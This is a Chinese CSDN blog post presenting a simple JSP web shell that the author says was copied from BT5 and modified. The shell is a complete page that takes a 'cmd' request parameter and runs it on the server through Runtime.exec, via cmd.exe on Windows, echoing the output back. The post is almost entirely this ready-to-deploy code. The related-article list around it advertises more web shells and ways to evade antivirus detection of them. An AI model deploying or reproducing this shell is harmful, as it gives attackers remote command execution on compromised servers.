webshell之简单版本jsp

最新推荐文章于 2024-03-02 22:47:58 发布
最新推荐文章于 2024-03-02 22:47:58 发布
阅读量5.8k 收藏 1
点赞数
分类专栏: 安全 木马病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9533927
版权

从BT5上复制下来的,简单修改了一下:

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<html>
<head>
<title>cmdjsp</title>
</head>
<body>
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>

<%@ page import="java.io.*" %>
<pre>
<%
   String cmd = request.getParameter("cmd");
   String output = "";

   if(cmd != null) {
      String s = null;
      try {
         Process p = null;
         cmd = cmd.replaceAll("\\+", " ");
         if (System.getProperty("os.name").toUpperCase().indexOf("WINDOWS") != -1) {
         	p = Runtime.getRuntime().exec("cmd.exe /C \"" + cmd + "\"");
				 } else {
					p = Runtime.getRuntime().exec( cmd );
				 }
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) {
         		s = s.replaceAll("<", "<");
         		s = s.replaceAll(">", ">");
%>
<%=s%>
<%
         }
         
      }
      catch(IOException e) {
         e.printStackTrace();
      }
   }
%>
</pre>
</body>
</html>


feier7501
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jspwebshell.txt
04-07
jspwebshell.txt
java webshell_几种典型 JSP WebShell 的深度解析
weixin_29455479的博客
02-24 3070
WebShell 只有下载文件的功能,无法执行系统命令。传入文件名称和文件下载 URL,连接该 WebShell:下载完成之后,在当前路径下生成 1.png 文件:3.1 代码分析:获取参数 u 的值,打开该 URL 获取字节流:java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();创...
jsp webshell 初识
最新发布
weixin_50217210的博客
03-02 372
访问得到os.name的信息 代码中可以接收参数cmd 我们提供参数看看 cmd=ipconfig。没问题这里(只是我测试的时候没有处理图片,就不放置了)很有可能是字节输出的代码被检测到了,我们删除了看一下。果然,删除以后检测不到了,那我们想办法绕过。之前是执行exec参数,这次是可疑文件。放到IDEA中webapp下测试一下。在D盾跑还是被检测到了,换一种方式输出字节流。
java 简单webshell_一个简单webshell
weixin_35430535的博客
02-26 661
Thanks for your support "};String[] strFileManage={"文 件 管 理","File Management"};String[] strCommand={"CMD 命 令","Command Window"};String[] strSysProperty={"系 统 属 性","System Property"};String[] strHelp...
jsp cmd
mmllkkjj的专栏
01-14 1318
<br />http://hi.baidu.com/forhack/blog/item/9ebaf70673b95b7e02088181.html<br /> <br /><%@ page contentType="text/html; charset=gb2312"%><br /> <%@ page import="java.io.*"%><br /> <html><br /> <head><title>jsp之cmd功能</title><br /> </head><br /> <body bg
tomcat下jsp shellwebshell
夜行者~@
11-10 8524
首先要了解,什么是服务器,什么是web,服务器就是和电脑一样的,有操作系统,操作系统与磁盘,网卡,内存等等组合起来的就叫服务器,web内,是服务器上面的一个应用,tomcat就是一个应用,可以解析jsp文件,tomat运行之后,丢jsp进去,可以马上解析jsp文件,tomcat运行之后java sdk以及运行,jsp可以条用java sdk api,java api可以条用系统shell,这样就形...
JSP运行Shell并返回结果
huplion的专栏
04-02 2686
在JavaWeb项目中添加一个jsp文件,此处以shell.jsp为例<%@page import="java.io.IOException"%> <%@page import="java.io.InputStreamReader"%> <%@page import="java.io.BufferedReader"%> <%@ page language="java" import="java.ut
认识JSP webshell免杀
xlsj雪松的博客
08-19 782
Tomcat运行这就是一个典型的webshell,但这个webshell的各种特征已经被安全检测平台记录,很容易识别出来。【D盾】【shellpub】接下来进行免杀,免杀就是将这些被识别的特征进行替换,绕过,混淆和干扰。
en.rar_jsp webshell
09-19
en.jsp 操作服务器文件命令 俗称webshell
webshell -真实可用的jsp
03-30
网上很多一句话、webshell 各种原因导致不能用,亲测可用的大马,忍痛割爱与大家分享
jspshell 一些JSP的工具
06-24
jspshell 一些JSP的工具 非常好用的JSP工具集
jsp webshell cmd
10-18
jsp webshell cmd jsp 代码
JSPwebshell
08-21
忍痛分享啊。
JSP webshell免杀——webshell免杀
weixin_46601374的博客
06-29 3332
好搞笑,我身边的人省护期间天天提到许少,听说是一个很厉害的大佬。结果我免杀跟着学的视频就是这位大佬的。更离谱的是,聪哥说我们是见过许少的,就是上次给红队整理报告的时候,他就在。果然,实习就是好,传说中的大佬们就在身边——虽然我都不认识,但是还是感觉好厉害。来吧,开始学习免杀首先就是最简单的一句话木马: 太容易被发现了而且在我写代码的时候电脑的病毒和威胁防护就已经开始反应了现在将这一句话木马,分开来写 沙箱是通过了✌但是cmd=ipconfig是什么都不出的,netstat -ano也是。 再次修改代码中间
JSP免杀马
hackzkaq的博客
10-20 404
针对PHP马可通过监测核心的eval函数进行查杀,但是JSP马的查杀目前还没有很好的监测办法,除上述的利用进行免杀外,还可通过创建Runtime的父类等方式。笔者水平有限,欢迎大家指出问题。`m 9`竟然是敏感词,我把文中的换成了@@@,大家自行替换即可。原文地址:https://www.freebuf.com/articles/web/355975.html。
获取WebShell思路
acepanhuan的博客
02-27 1294
获取webshell思路
JSP Webshell 免杀
悦分享
08-01 1580
上面提到JSP在第一次运行的时候会先被Web容器,如Tomcat翻译成Java文件,然后才会被Jdk编译成为Class加载到jvm虚拟机中运行。JDK在编译的时候只看java文件的格式是否正确。而Tomcat在翻译JSP的不会检查其是否合乎语法。...
过d盾 jsp webshell+冰蝎免杀马探讨
goddemon
07-19 2250
jsp免杀马的思路其实一般最常用的就是反射和类加载问题+反转问题就能bypasswebshell的查杀了当然现在的有些厂商直接强标识这种就要el去绕咯。
Jsp Webshell request.get木马的特征?
07-12
JSP Webshell 是一种基于 JSP 技术的恶意软件,它被用来在受感染的服务器上执行恶意操作。针对 request 对象的一些常见攻击模式和特征包括: 1. 非法的请求参数:Webshell 可能会使用非法的请求参数来执行恶意操作,例如包含特殊字符、路径遍历、SQL 注入等。 2. 异常的请求路径:Webshell 可能会使用异常的请求路径,例如使用不存在的 JSP 文件名或路径,以触发服务器的异常处理逻辑。 3. 隐藏的请求参数:Webshell 可能会使用隐藏的请求参数,这些参数可能不会在正常请求中出现,但可以触发特定的恶意操作。 4. 远程命令执行:Webshell 可能会通过 request 对象执行远程命令,例如执行系统命令、读取文件内容、连接到远程服务器等。 5. 文件上传漏洞利用:Webshell 可能会利用文件上传漏洞,通过 request 对象上传恶意文件到服务器,并在上传后执行其中的恶意代码。 6. 对 Web 容器的漏洞利用:Webshell 可能会利用 Web 容器(如 Tomcat、Jetty 等)的漏洞,通过 request 对象执行恶意操作。 7. 加密/编码:Webshell 可能会对请求参数进行加密或编码,以避免被检测到。 这些特征只是一些常见的示例,实际上,Webshell 的形式和特征会因攻击者和具体的攻击方式而有所不同。为了保护服务器安全,建议采取安全措施,如及时更新软件、限制文件上传、过滤恶意请求参数等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值